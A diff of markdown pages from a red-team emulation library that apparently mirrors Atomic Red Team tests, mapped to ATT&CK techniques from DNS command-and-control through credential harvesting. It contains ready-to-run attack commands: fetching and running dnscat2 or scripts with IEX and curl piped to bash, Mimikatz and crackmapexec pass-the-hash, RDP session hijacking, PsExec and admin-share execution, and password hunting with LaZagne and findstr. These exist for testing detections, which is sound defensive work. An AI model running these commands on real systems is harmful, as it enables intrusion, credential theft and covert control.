## Atomic Test #4 - DNS Large Query Volume + This test simulates an infected host sending a large volume of DNS queries to a command and control server. -The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain. +The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source +system or to a single targe domain. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | 127.0.0.1.xip.io| @@ -141,32 +122,26 @@ The intent of this test is to trigger threshold based detection on the number of | query_type | DNS query type | string | TXT| | query_volume | Number of DNS queries to send | integer | 1000| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} ``` - - - - -

## Atomic Test #5 - DNS Regular Beaconing -This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. -This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. - -**Supported Platforms:** Windows - +This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over +time. +This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query +volume over time to evade threshold based detection. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | 127.0.0.1.xip.io| @@ -176,107 +151,83 @@ This behaviour is typical of implants either in an idle state waiting for instru | c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20| | runtime | Time in minutes to run the simulation | integer | 30| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime} ``` - - - - -

## Atomic Test #6 - DNS Long Domain Query + This test simulates an infected host returning data to a command and control server using long domain names. -The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. +The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The +intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | 127.0.0.1.xip.io| | subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte| | query_type | DNS query type | string | TXT| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} ``` - - - - -

## Atomic Test #7 - DNS C2 -This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. + +This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS +records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com| | server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} ``` - - - - -

## Atomic Test #8 - OSTap Payload Download + Uses cscript //E:jscript to download a file **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js| | file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} @@ -284,12 +235,9 @@ cscript //E:Jscript #{script_file} ``` #### Cleanup Commands: + ```cmd del #{script_file} /F /Q >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1073.md b/Atomic_Threat_Coverage/Triggers/T1073.md index fb3f4686..81eeb282 100644 --- a/Atomic_Threat_Coverage/Triggers/T1073.md +++ b/Atomic_Threat_Coverage/Triggers/T1073.md @@ -1,59 +1,60 @@ # T1073 - DLL Side-Loading + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1073) +
Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014) -Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.
+Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or +software process. ## Atomic Tests - [Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary](#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary) -
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary -GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. + +GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus +enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_name | Name of the created process | string | calculator.exe| | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder\T1073\bin\GUP.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd #{gup_executable} ``` #### Cleanup Commands: + ```cmd taskkill /F /IM #{process_name} >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{gup_executable}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1073/bin/GUP.exe" -OutFile "#{gup_executable}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1074.md b/Atomic_Threat_Coverage/Triggers/T1074.md index 013cd8d4..53a7ad3e 100644 --- a/Atomic_Threat_Coverage/Triggers/T1074.md +++ b/Atomic_Threat_Coverage/Triggers/T1074.md @@ -1,8 +1,11 @@ # T1074 - Data Staged + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1074) +
Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022). -Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
+Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) +and bash may be used to copy data into a staging location. ## Atomic Tests @@ -12,97 +15,77 @@ Interactive command shells may be used, and common functionality within [cmd](ht - [Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp](#atomic-test-3---zip-a-folder-with-powershell-for-staging-in-temp) -
## Atomic Test #1 - Stage data from Discovery.bat -Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, + +Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data +collection tools onto the host. Upon execution, verify that the file is saved in the temp directory. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file} ``` #### Cleanup Commands: + ```powershell Remove-Item -Force #{output_file} -ErrorAction Ignore ``` - - - -

## Atomic Test #2 - Stage data from Discovery.sh + Utilize curl to download discovery.sh and execute a basic information gathering shell script **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log ``` - - - - -

## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp -Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip + +Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon +execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074\bin\Folder_to_zip| | output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force ``` #### Cleanup Commands: + ```powershell Remove-Item -Path #{output_file} -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1075.md b/Atomic_Threat_Coverage/Triggers/T1075.md index d3ffaa93..5c2e4685 100644 --- a/Atomic_Threat_Coverage/Triggers/T1075.md +++ b/Atomic_Threat_Coverage/Triggers/T1075.md @@ -1,8 +1,11 @@ # T1075 - Pass the Hash + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1075) +
Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. -Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)
+Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: +NSA Spotting) ## Atomic Tests @@ -10,50 +13,40 @@ Windows 7 and higher with KB2871997 require valid domain user credentials or RID - [Atomic Test #2 - crackmapexec Pass the Hash](#atomic-test-2---crackmapexec-pass-the-hash) -
## Atomic Test #1 - Mimikatz Pass the Hash + Note: must dump hashes first [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | domain | domain | string | atomic.local| | ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} ``` - - - - -

## Atomic Test #2 - crackmapexec Pass the Hash + command execute with crackmapexec **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| @@ -62,29 +55,26 @@ command execute with crackmapexec | command | command to execute | string | whoami| | crackmapexec_exe | crackmapexec windows executable | Path | C:\CrackMapExecWin\crackmapexec.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) + ##### Check Prereq Commands: + ```powershell if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } ``` + ##### Get Prereq Commands: + ```powershell Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1076.md b/Atomic_Threat_Coverage/Triggers/T1076.md index 34d88ecc..57e78d4e 100644 --- a/Atomic_Threat_Coverage/Triggers/T1076.md +++ b/Atomic_Threat_Coverage/Triggers/T1076.md @@ -1,10 +1,24 @@ # T1076 - Remote Desktop Protocol + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1076) -
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS. -Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware) +
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS. -Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)
+Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to +accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use +with RDP. Adversaries may also use RDP in conjunction with +the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: +Alperovitch Malware) + +Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. +Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With +System permissions and using Terminal Services Console, c: +\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for +credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with +active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead +to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain +Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also +been added as a feature in RedSnarf. (Citation: Kali Redsnarf)
## Atomic Tests @@ -12,26 +26,24 @@ Adversaries may also perform RDP session hijacking which involves stealing a leg - [Atomic Test #2 - RDPto-DomainController](#atomic-test-2---rdpto-domaincontroller) -
## Atomic Test #1 - RDP hijacking -RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization - -**Supported Platforms:** Windows - +RDP +hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) +- how to hijack RDS and RemoteApp sessions transparently to move through an organization +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | Session_ID | The ID of the session to which you want to connect | String | 1337| | Destination_ID | Connect the session of another user to a different session | String | rdp-tcp#55| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd query user @@ -40,54 +52,47 @@ net start sesshijack ``` #### Cleanup Commands: + ```cmd sc.exe delete sesshijack >nul 2>&1 ``` - - - -

## Atomic Test #2 - RDPto-DomainController + Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("\")| | username | Username argument default %USERDOMAIN%\%username% | String | $Env:USERDOMAIN\$ENV:USERNAME| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Connect-RDP -ComputerName #{logonserver} -User #{username} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Computer must be domain joined + ##### Check Prereq Commands: + ```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Joining this computer to a domain must be done manually ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1077.md b/Atomic_Threat_Coverage/Triggers/T1077.md index 618446b6..8756294b 100644 --- a/Atomic_Threat_Coverage/Triggers/T1077.md +++ b/Atomic_Threat_Coverage/Triggers/T1077.md @@ -1,10 +1,22 @@ # T1077 - Windows Admin Shares + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1077) +
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. -Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares) +Adversaries may use this technique in conjunction with +administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system +over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs) +, (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution +techniques that rely on authenticated sessions over SMB/RPC +are [Scheduled Task](https://attack.mitre.org/techniques/T1053) +, [Service Execution](https://attack.mitre.org/techniques/T1035), +and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM +hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and +certain configuration and patch levels. (Citation: Microsoft Admin Shares) -The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials. (Citation: Technet Net Use)
+The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote +systems using net use commands with valid credentials. (Citation: Technet Net Use) ## Atomic Tests @@ -16,18 +28,16 @@ The [Net](https://attack.mitre.org/software/S0039) utility can be used to connec - [Atomic Test #4 - Execute command writing output to local Admin Share](#atomic-test-4---execute-command-writing-output-to-local-admin-share) -
## Atomic Test #1 - Map admin share + Connecting To Remote Shares **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Examples C$, IPC$, Admin$ | String | C$| @@ -35,109 +45,80 @@ Connecting To Remote Shares | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" ``` - - - - -

## Atomic Test #2 - Map Admin Share PowerShell + Map Admin share utilizing PowerShell **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Examples C$, IPC$, Admin$ | String | C$| | computer_name | Target Computer Name | String | Target| | map_name | Mapped Drive Letter | String | g| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} ``` - - - - -

## Atomic Test #3 - Copy and Execute File with PsExec -Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). - -**Supported Platforms:** Windows - +Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec +from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) +. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote computer to receive the copy and execute the file | String | \\localhost| | command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd psexec.exe #{remote_host} -c #{command_path} ``` - - - - -

## Atomic Test #4 - Execute command writing output to local Admin Share + Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Remote computer to receive the copy and execute the file | String | output.txt| | command_to_execute | Command to execute for output. | String | hostname| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1081.md b/Atomic_Threat_Coverage/Triggers/T1081.md index 806c016f..5d8a96c7 100644 --- a/Atomic_Threat_Coverage/Triggers/T1081.md +++ b/Atomic_Threat_Coverage/Triggers/T1081.md @@ -1,10 +1,16 @@ # T1081 - Credentials in Files + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1081) +
Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. -It is possible to extract passwords from backups or saved virtual machines through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) +It is possible to extract passwords from backups or saved virtual machines +through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be +obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) -In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage) +In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In +some cases, these files can be copied and reused on another machine or the contents can be read and then used to +authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)
@@ -18,107 +24,72 @@ In cloud environments, authenticated user credentials are often stored in local - [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml) -
## Atomic Test #1 - Extract Browser and System credentials with LaZagne + [LaZagne Source](https://github.com/AlessandroZ/LaZagne) **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh python2 laZagne.py all ``` - - - - -

## Atomic Test #2 - Extract passwords with grep + Extracting credentials from files **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to search | String | /| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh grep -ri password #{file_path} ``` - - - - -

## Atomic Test #3 - Extracting passwords with findstr + Extracting Credentials from Files **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell findstr /si pass *.xml *.doc *.txt *.xls ls -R | select-string -Pattern password ``` - - - - -

## Atomic Test #4 - Access unattend.xml -Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. - -**Supported Platforms:** Windows - - - +Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation +logs are stored. -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd type C:\Windows\Panther\unattend.xml > nul 2>&1 type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1 ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1082.md b/Atomic_Threat_Coverage/Triggers/T1082.md index c6ae995c..aec1fc93 100644 --- a/Atomic_Threat_Coverage/Triggers/T1082.md +++ b/Atomic_Threat_Coverage/Triggers/T1082.md @@ -1,26 +1,39 @@ # T1082 - System Information Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1082) +
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. ### Windows -Example commands and utilities that obtain this information include ver, [Systeminfo](https://attack.mitre.org/software/S0096), and dir within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories. +Example commands and utilities that obtain this information include ver +, [Systeminfo](https://attack.mitre.org/software/S0096), and dir +within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and +directories. ### Mac -On Mac, the systemsetup command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the system_profiler gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions. +On Mac, the systemsetup command gives a detailed breakdown of the system, but it requires administrative +privileges. Additionally, the system_profiler gives a very detailed breakdown of configurations, firewall +rules, mounted volumes, hardware, and many other things without needing elevated permissions. ### AWS -In Amazon Web Services (AWS), the Application Discovery Service may be used by an adversary to identify servers, virtual machines, software, and software dependencies running.(Citation: Amazon System Discovery) +In Amazon Web Services (AWS), the Application Discovery Service may be used by an adversary to identify servers, virtual +machines, software, and software dependencies running.(Citation: Amazon System Discovery) ### GCP -On Google Cloud Platform (GCP) GET /v1beta1/{parent=organizations/*}/assets or POST /v1beta1/{parent=organizations/*}/assets:runDiscovery may be used to list an organizations cloud assets, or perform asset discovery on a cloud environment.(Citation: Google Command Center Dashboard) +On Google Cloud Platform (GCP) GET /v1beta1/{parent=organizations/*}/assets or POST +/v1beta1/{parent=organizations/*}/assets:runDiscovery may be used to list an organizations cloud assets, or +perform asset discovery on a cloud environment.(Citation: Google Command Center Dashboard) ### Azure -In Azure, the API request GET https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachines/{vmName}?api-version=2019-03-01 may be used to retrieve information about the model or instance view of a virtual machine.(Citation: Microsoft Virutal Machine API)
+In Azure, the API request +GET https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachines/{vmName}?api-version=2019-03-01 +may be used to retrieve information about the model or instance view of a virtual machine.(Citation: Microsoft Virutal +Machine API) ## Atomic Tests @@ -40,45 +53,31 @@ In Azure, the API request GET https://management.azure.com/subscriptions/{ - [Atomic Test #8 - Windows MachineGUID Discovery](#atomic-test-8---windows-machineguid-discovery) -
## Atomic Test #1 - System Information Discovery + Identify System Info **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd systeminfo reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum ``` - - - - -

## Atomic Test #2 - System Information Discovery + Identify System Info **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh systemsetup @@ -86,25 +85,16 @@ system_profiler ls -al /Applications ``` - - - - -

## Atomic Test #3 - List OS Information + Identify System Info **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh uname -a >> /tmp/loot.txt @@ -114,25 +104,16 @@ uptime >> /tmp/loot.txt cat /etc/issue >> /tmp/loot.txt ``` - - - - -

